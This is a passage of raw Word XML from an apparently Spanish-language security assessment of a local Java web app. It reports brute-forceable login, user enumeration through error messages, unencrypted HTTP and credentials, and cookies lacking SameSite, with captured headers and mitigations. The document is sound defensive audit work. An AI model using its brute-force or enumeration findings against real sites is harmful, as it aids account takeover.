      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000272">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000273">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000274">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ws5fg2zibcev" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000275">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000276">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Al no existir ningún tipo de captcha ni tiempo de espera entre peticiones, nos es muy fácil realizar fuerza bruta sobre un usuario para desvelar su contraseña</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000277">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4829175" cy="2124075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47"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48291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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000279">
      <w:pPr>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CVE-2022-1039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CWE-521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Puntuación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CAPEC-112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MITRE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T1110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Introducción de numerosas contraseñas automáticamente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c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Limitar números de intentos para inicio de sesión, utilizar un captcha…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e0m760ycerkm" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Observable Discrepancy</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CWE-203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producto se comporta de manera diferente o envía respuestas diferentes en diferentes circunstancias de una manera que es observable por un actor no autorizado, lo que expone información relevante para la seguridad sobre el estado del producto, como si una operación en particular fue exitosa o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Cambiar los mensajes de error para que sean iguales y no dar demasiada información</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Si intentamos iniciar sesión con un usuario inexistente, nos saltará una validación conforme este usuario no existe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2197100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48"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Sin embargo, si el usuario existe, la información obtenida cambia conforme este usuario exista.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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Una posible solución sería cambiar el mensaje de error en la página “Constants.java” para que sea igual de ambas formas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1689100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="23"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Ahora el mensaje siempre será el mismo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29"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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vc04644sww3m" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conexión no encriptada -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AC">
      <w:pPr>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CWE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shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-319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shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">No se usa https para encriptar el tráfico, con lo cual cualquiera puede estar escuchando y robar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shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Para solucionar este problema habría que usar https.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Ejemplo:</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HTTP Request:</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GET /webjars/jquery-form-validator/form-validator/theme-default.min.css HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 192.168.1.22:8888</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">accept: text/css,*/*;q=0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">accept-language: en-US</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie: JSESSIONID=B849FBC9B221E7A4E57420B62A70AEE9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Referer: http://192.168.1.22:8888/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Encoding: gzip,deflate,br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a1b4p2kplofy" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Las credenciales de usuario se mandan en texto plano -&gt;</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CWE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CWE-523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hd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Las credenciales de usuario se transmiten a través de un canal no cifrado. Esta información siempre debe transferirse a través de un canal encriptado (HTTPS) para evitar que sea interceptada por usuarios malintencionados</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clea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shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Debido a que las credenciales de usuario se consideran información confidencial se </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">deben enviarse mediante HTTPS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Ejemplo:</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    http://192.168.1.22:8888/login</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    Form name: &lt;empty&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Form action: &lt;empty&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Form method: POST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Password input: password</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    http://192.168.1.22:8888/registration</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    Form name: &lt;empty&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Form action: &lt;empty&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Form method: POST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Password input: password_confirmation</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1"/>
        <w:spacing w:after="0" w:before="0" w:line="308.5714285714286" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hn9s99uvjk9b" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookies con propiedades faltantes, inconsistentes o contradictorias -&gt;</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t xml:space="preserve">CWE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CWE-284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shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002ED">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:before="0" w:line="308.5714285714286" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Al menos una de las siguientes propiedades de las cookies hace que la cookie no sea válida o sea incompatible con una propiedad diferente de la misma cookie o con el entorno en el que se utiliza la cookie. Aunque esto no es una vulnerabilidad en sí misma, es probable que conduzca a un comportamiento inesperado de la aplicación, que a su vez puede causar problemas de seguridad secundarios.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clea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before="0" w:line="308.5714285714286" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Asegúrese de que la configuración de las cookies cumpla con los estándares aplicables.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pP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Ejemplo:</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http://192.168.1.22:8888/</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Cookie was set with:</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Set-Cookie: JSESSIONID=B849FBC9B221E7A4E57420B62A70AEE9; Path=/; HttpOnly</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This cookie has the following issues:</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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000303">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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http://192.168.1.22:8888/changePassword</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Cookie was set with:</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Set-Cookie: JSESSIONID=1FA795925F154818289E91E9A1FC0CEA; Path=/; HttpOnly</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This cookie has the following issues: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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000310">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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http://192.168.1.22:8888/profile/</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Cookie was set with:</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Set-Cookie: JSESSIONID=2BCB9127DD91ED5B8F5F46D09C55C8A2; Path=/; HttpOnly</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This cookie has the following issues:</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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".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http://192.168.1.22:8888/registration</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Cookie was set with:</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Set-Cookie: JSESSIONID=B4B3EBC957A1CE7FE987F355A2873371; Path=/; HttpOnly</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This cookie has the following issues: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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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http://192.168.1.22:8888/cart</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Cookie was set with:</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Set-Cookie: JSESSIONID=E9DDF58393862D72C31051AB293F39C2; Path=/; HttpOnly</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This cookie has the following issues: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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000337">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
